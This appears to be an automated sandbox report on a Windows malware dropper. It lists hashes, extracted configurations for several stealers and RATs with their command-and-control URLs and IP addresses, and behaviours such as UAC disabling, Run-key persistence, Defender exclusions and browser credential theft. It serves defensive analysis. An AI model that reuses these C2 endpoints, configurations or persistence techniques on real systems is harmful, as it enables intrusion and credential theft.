Resubmissions
16-12-2024 05:27
241216-f5kx6awmh1 1014-12-2024 20:23
241214-y6jqlasrhy 1014-12-2024 20:22
241214-y51bysvmbk 1014-12-2024 20:13
241214-yzc98svkfr 1014-12-2024 13:14
241214-qgw1masrcy 1014-12-2024 13:12
241214-qfk7qsvlaq 312-12-2024 18:19
241212-wymq6ssnat 1012-12-2024 18:16
241212-www7tssmet 10Analysis
-
max time kernel
959s -
max time network
1200s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-12-2024 18:19
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
New Text Document mod.exe
Resource
win10v2004-20241007-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
lumma
https://impend-differ.biz/api
https://print-vexer.biz/api
https://dare-curbys.biz/api
https://covery-mover.biz/api
https://formy-spill.biz/api
https://dwell-exclaim.biz/api
https://zinc-sneark.biz/api
https://se-blurry.biz/api
https://infect-crackle.cyou/api
https://moutheventushz.shop/api
https://respectabosiz.shop/api
https://bakedstusteeb.shop/api
https://conceszustyb.shop/api
https://nightybinybz.shop/api
https://standartedby.shop/api
https://mutterissuen.shop/api
https://worddosofrm.shop/api
https://berrylinyj.cyou/api
Extracted
risepro
3.36.173.8:50500
Extracted
remcos
RemoteHost
192.210.150.26:8787
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-R1T905
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
xworm
HITROL-60505.portmap.host:60505
-
Install_directory
%LocalAppData%
-
install_file
Google Chrome.exe
-
pastebin_url
https://pastebin.com/raw/hhG5zGXd
Extracted
redline
1337
194.87.248.37:1912
Extracted
stealc
default2
http://185.215.113.17
-
url_path
/2fb6c2cc8dce150a.php
Extracted
stealc
Voov3
http://154.216.17.90
-
url_path
/a48146f6763ef3af.php
Extracted
asyncrat
0.5.7B
Default
96.248.52.125:8031
adobe_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
update.exe
-
install_folder
%Temp%
Extracted
stealc
default
http://91.202.233.158
-
url_path
/e96ea2db21fa9a1b.php
Extracted
asyncrat
| Edit 3LOSH RAT
newwwwwwwwwwwwwwwwww
185.16.38.41:2033
185.16.38.41:2034
185.16.38.41:2035
185.16.38.41:2022
185.16.38.41:2023
185.16.38.41:2024
185.16.38.41:20000
185.16.38.41:6666
AsyncMutex_XXXX765643
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
lumma
https://infect-crackle.cyou/api
https://covery-mover.biz/api
https://drive-connect.cyou/api
Signatures
-
Amadey family
-
Asyncrat family
-
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x0007000000023cef-1662.dat family_xworm behavioral1/memory/3532-1667-0x0000000000840000-0x000000000085A000-memory.dmp family_xworm behavioral1/files/0x0007000000023d22-2173.dat family_xworm behavioral1/memory/312-2181-0x0000000000BC0000-0x0000000000BDC000-memory.dmp family_xworm -
Detects ZharkBot payload 2 IoCs
ZharkBot is a botnet written C++.
resource yara_rule behavioral1/files/0x0007000000023ce6-1461.dat zharkcore behavioral1/files/0x0008000000023d7d-2908.dat zharkcore -
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
-
Exelastealer family
-
Lumma family
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" svchost.exe -
Phorphiex family
-
Phorphiex payload 1 IoCs
resource yara_rule behavioral1/files/0x001200000001eb66-1332.dat family_phorphiex -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/files/0x0007000000023cf4-1718.dat family_quasar behavioral1/files/0x000a000000023cfd-1785.dat family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
resource yara_rule behavioral1/files/0x0007000000023d25-2198.dat family_redline behavioral1/memory/1840-2203-0x0000000000160000-0x00000000001B2000-memory.dmp family_redline behavioral1/files/0x0009000000023db9-3260.dat family_redline behavioral1/files/0x000e000000023e27-3883.dat family_redline -
Redline family
-
Remcos family
-
Risepro family
-
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description pid Process procid_target PID 2180 created 3464 2180 Blsvr.exe 56 PID 2180 created 3464 2180 Blsvr.exe 56 PID 2180 created 3464 2180 Blsvr.exe 56 PID 3964 created 3464 3964 1657333799.exe 56 PID 3964 created 3464 3964 1657333799.exe 56 PID 876 created 3464 876 winupsecvmgr.exe 56 PID 876 created 3464 876 winupsecvmgr.exe 56 PID 876 created 3464 876 winupsecvmgr.exe 56 PID 1680 created 3464 1680 Possibly.pif 56 -
Systembc family
-
TA505
Cybercrime group active since 2015, responsible for families like Dridex and Locky.
-
Ta505 family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" wefhrf.exe -
XMRig Miner payload 10 IoCs
resource yara_rule behavioral1/files/0x0008000000023c9f-672.dat family_xmrig behavioral1/files/0x0008000000023c9f-672.dat xmrig behavioral1/memory/2180-686-0x00007FF6B9070000-0x00007FF6B95E8000-memory.dmp xmrig behavioral1/memory/2372-712-0x00007FF6DA440000-0x00007FF6DAC2F000-memory.dmp xmrig behavioral1/memory/2372-714-0x00007FF6DA440000-0x00007FF6DAC2F000-memory.dmp xmrig behavioral1/memory/2372-859-0x00007FF6DA440000-0x00007FF6DAC2F000-memory.dmp xmrig behavioral1/memory/2372-1310-0x00007FF6DA440000-0x00007FF6DAC2F000-memory.dmp xmrig behavioral1/memory/2372-1344-0x00007FF6DA440000-0x00007FF6DAC2F000-memory.dmp xmrig behavioral1/memory/2372-1365-0x00007FF6DA440000-0x00007FF6DAC2F000-memory.dmp xmrig behavioral1/memory/2372-1384-0x00007FF6DA440000-0x00007FF6DAC2F000-memory.dmp xmrig -
Xmrig family
-
Xworm family
-
Zharkbot family
-
Async RAT payload 3 IoCs
resource yara_rule behavioral1/files/0x0007000000023cfa-1727.dat family_asyncrat behavioral1/files/0x0007000000023d2a-2236.dat family_asyncrat behavioral1/files/0x000c000000023c94-2826.dat family_asyncrat -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ qth5kdee.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ chrome_93.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
Adds policy Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" remcos.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run file.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" file.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run remcos.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" remcos.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run RMX.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" RMX.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run remcos.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 470 3544 Process not Found 472 3544 Process not Found 474 3544 Process not Found 476 3544 Process not Found 477 3544 Process not Found 479 3544 Process not Found -
Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 8680 powershell.exe 4416 powershell.exe 1388 powershell.exe 5788 powershell.exe 4904 powershell.exe 6504 powershell.exe 9968 powershell.exe 876 powershell.exe 820 powershell.exe 5976 powershell.exe 5056 powershell.exe 6096 powershell.exe 644 powershell.exe 1004 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts chrome_93.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1460 netsh.exe 1516 netsh.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (c13606fe9009f11d)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (c13606fe9009f11d)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=fnback9636.site&p=8041&s=dff84209-b7dc-448b-8fd8-d772cabe318e&k=BgIAAACkAABSU0ExAAgAAAEAAQA9jYIrttwwC%2fVG8pSgng7hOaOxKOcglvdFFtkWeOWtX8fqsZgIKfVrWuN3su1CgiFbvlCYAExDue6opAYsm4ZcU%2fXlAy9prKBw8dHgYIr5MKTVcZ179o9h8%2f%2bnJY4jOeDKVmcK57L%2fEAFTuKdJ4YjAwIneAffDLjer1Vf%2banxJ%2b%2fQG9GXKFTsCbQPC0DPoXGR4nhNlJsUIT37D9pxvtL82%2fbs5OFG6ebhQ2MBDFYY21oOxjFRMMIWi2Owda95WULvij7v9vchg4Zacetd90xJGtyFFMUL53dS%2fRJ%2bjUcnwVvLNyKx3HwIoiBSP6LM2Nm5EN5LWd0R%2b3hStk2Qltk%2bh&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAfYu9oc1am0yvHfxstgb83QAAAAACAAAAAAAQZgAAAAEAACAAAAAcl7QJx51WIWlm%2f97d68knOHLDmhc8YMk%2bWpKSiakhXgAAAAAOgAAAAAIAACAAAABQXA1RRCIL0SpawatzWi8kVVFrY5j8hGLctHYZFOSln6AEAACLQgNbihyXmbxTioM8KOy3WlcD1ubNH%2bKYLVkdjJpCsLwv1c09knFTKqPX%2bTKT66q%2fkv%2f4mCQq3e1BsOiaqZX6xcUzuAHT34p%2bvGM9Sm%2baiAoR1T84wW4OgKg949Kiq4gADYRGK%2fRa2QNt1%2fjD2UgM6CEoUoFsEnwkZkXXVXtRyNw3nOkXC%2fMclQ1sFX9JaOaD9twuD7lhh2kl4eV7HIj%2fXTVAnXNW1jLdwzJA9kNEVEk2m0pffdIxlgIkXt0Ew86Lq%2f%2bPzf71dMz6te1zFuVJOdFbpOomcgUxOnLGCZaCoyEJ5vn094pYBr7hyfj7zA9eRbiOhYJ%2bHaRXszadpR8ebDP7U3PZFBAr9RROyolueMMnWjL2O6B6%2fb9dqMTjdUYHYtfpBx0fL7AMLuLgAgPVPNA7R3XC3tAuVfHKxahgSmU21p%2bIVp4Wg5lnQFB32KJpLaiBODcfc14tR8ktV6jIt1sb9qlnHVWvq2k62%2frwrp98RKVCoISo9xAbRejo1Z99IcG7aDbXheLWYYWCTtPT0FhHopqowddl8O%2fBlo7E7%2fQJdGTKzmgf8bKhAtt3lL0ReY322bXHJ%2faZVoRe%2f718J9PUB61SO%2fsHS6KpHdmNyZHUA6GWSnKoRYrbZXpEYlexMhzNbp%2f1mLIDfAxgoSg4cOJVh2HXoKSk7c2W6gOoIsFmwv%2bMyX9AT6Zn0M7uYdMi4EemPzsUFSv3woU6Kzovjevy7c0aueREmdCmSIf64gSphEZGLt5gKfVG8nrGDUkW1T6H9VuLAEW%2fGiPWecfPqIFXDdt2TWwsJIw8XujiGu%2blUgitOBO5IwtX2Ygyd6G4q%2fP%2bdvvL4INiPuePVAlKEMsHdBL%2b8P8CQhIO6XZSSpNxydlv78svrwOQCUzXUKPTs2ZHhq%2bYdrVmhoBiX60zLEdxM%2fwoM9cDwn0a4Eelh6abY6EMyxPETEoMXITUZOmon8b8g0J5XwWTyiXeQdlZ%2fG6BnmtQPtLry0qL0tJ13ArQ7UCcYM3gkUgi6fvwQmR7xT9mhagjQANmSSLZAM%2f50laioMrkgXgG%2f994rDbTRey5%2bzAWhACVKAH6sneKqP1TY8SjvkM0Yr6DSpHXbfk7G3doZv3gmqD9Kp%2bl6cBhTdPoa0m5dGu8NWTiZM%2f53Dkl%2brf63PSqNIrYkPAchsi8U7Lm6hItPfjtf8Do0ErwYv8xjb7tYJ9RpoB9omjCG%2bKukWwF88A%2bWe8D2z3x%2bylvcon%2fcMkyoVdPWQPmxJwwu7Mjz2f1qBjV49dZf7qTX%2b9VnGIBmeIFsnSPhyAcDnmqLq1gjhweXDJrkZf8595GNlBm5FM6ph8En8j8oGVMSVKz5BWxmTvLEw3SMZXF1WfblcKcRySi1wEMwsESwPOihGPTGqTK7nlmH6U7NaZYDUNBZvrhceunf%2fqnI36nEM6U4%2fSSTUNswLSACpEiRDS0Y1j8ujBEGhCPvc1lr6%2f6i5ssUzEyuOoE9edLEPbzRP%2fNWc8kFnj%2fmcJ4A8PD%2b0rJ4v6d7vfI6vrL0ROC2sV5SuYPCYS1zdD1pwsxfzlP3ACcksEZhqzocuU%2bG3d4IRjKuUAAAADXZ2g92haPt%2fueSEcAxo%2fN8uUOko0EO9nRiEwmg%2fnDCULWNrQoIiZcn90AD2cGPdcBIuZzzp1QKfge3Z7LQx8h\"" ScreenConnect.ClientService.exe -
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 6152 chrome.exe 3936 msedge.exe 7636 msedge.exe 7628 msedge.exe 6900 msedge.exe 7060 msedge.exe 2888 chrome.exe 4388 chrome.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion chrome_93.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion chrome_93.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion qth5kdee.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion qth5kdee.exe -
Checks computer location settings 2 TTPs 26 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation ConsiderableWinners.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 1599224382.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 223522870.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation ATLEQQXO.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation AsyncClient.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation TPB-1.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation wefhrf.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation file1.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Opdxdyeul.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Pichon.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Statement-110122025.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation armadegon.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation ChatLife.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation H8hsp6zrMtJI2hC.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 7cl16anh.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Nework.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 8fc809.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation nothjgdwa.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation XClient.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Rage.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation RMX.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 1616 cmd.exe 2280 powershell.exe -
Drops startup file 10 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe Powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.exe 2020.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe Powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.exe 2020.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mrsYC4kDbQNPAiJow2kT3TU0.bat file1.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 64 IoCs
pid Process 2652 nothjgdwa.exe 656 Gxtuum.exe 2140 yiklfON.exe 3252 tester.exe 312 ChatLife.exe 868 4.exe 944 Paraguay.pif 2912 3dismhost.exe 3972 yiklfON.exe 708 yiklfON.exe 4124 2020.exe 3400 2020.exe 2180 Blsvr.exe 4220 tester.exe 1588 mi.exe 3552 Paraguay.pif 3156 Gxtuum.exe 4376 H8hsp6zrMtJI2hC.exe 4824 patcher.exe 4328 H8hsp6zrMtJI2hC.exe 808 7cl16anh.exe 2200 Cooper.pif 3760 JJSploit_8.10.7_x64-setup.exe 3836 pei.exe 3020 iupdate.exe 4772 3188116601.exe 4944 sysnldcvmr.exe 2008 223522870.exe 1044 Gxtuum.exe 3956 543810920.exe 3964 1657333799.exe 2124 864131738.exe 876 winupsecvmgr.exe 3156 1487620755.exe 2612 Unit.exe 4740 Gxtuum.exe 2316 install2.exe 3428 kmvcsaed.exe 1004 Gxtuum.exe 608 kxfh9qhs.exe 4168 alex2022.exe 448 alex2022.exe 1356 alex2022.exe 1504 alex2022.exe 3532 XClient.exe 4848 aqbjn3fl.exe 1960 IATInfect2008_64.exe 1888 leto.exe 1152 y8B03.exe 2624 DriverHost.exe 4468 Sync.exe 1244 Gxtuum.exe 2488 305iz8bs.exe 4140 sam.exe 5100 defender64.exe 2208 Gxtuum.exe 2548 OneDrive.exe 1644 jb4w5s2l.exe 3216 r2.exe 948 steel.exe 3644 Taskmgr.exe 764 Gxtuum.exe 1716 pghsefyjhsef.exe 3440 Pichon.exe -
Loads dropped DLL 64 IoCs
pid Process 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3760 JJSploit_8.10.7_x64-setup.exe 3760 JJSploit_8.10.7_x64-setup.exe 3152 pyexec.exe 2628 pyexec.exe 5008 MsiExec.exe 1336 rundll32.exe 1336 rundll32.exe 1336 rundll32.exe 1336 rundll32.exe 1336 rundll32.exe 1336 rundll32.exe 1336 rundll32.exe 1336 rundll32.exe 1336 rundll32.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe 5912 j62r8dhpa1.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0038000000023dc4-8493.dat themida -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Uses the VBS compiler for execution 1 TTPs
-
resource yara_rule behavioral1/files/0x0009000000023d52-2813.dat vmprotect behavioral1/memory/3152-2818-0x0000000000400000-0x000000000082B000-memory.dmp vmprotect behavioral1/memory/3152-2913-0x0000000000400000-0x000000000082B000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 17 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" 3188116601.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" RMX.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" file.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" file.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" remcos.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Yjlwuuys = "C:\\Users\\Admin\\AppData\\Roaming\\Yjlwuuys.exe" Opdxdyeul.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe" 2863614952.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" leto.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" RMX.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" remcos.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Monster Update Service = "C:\\Users\\Admin\\AppData\\Local\\MonsterUpdateService\\Monster.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-Y7B4RN = "\"C:\\ProgramData\\tst\\remcos.exe\"" remcos.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" remcos.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" explorer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
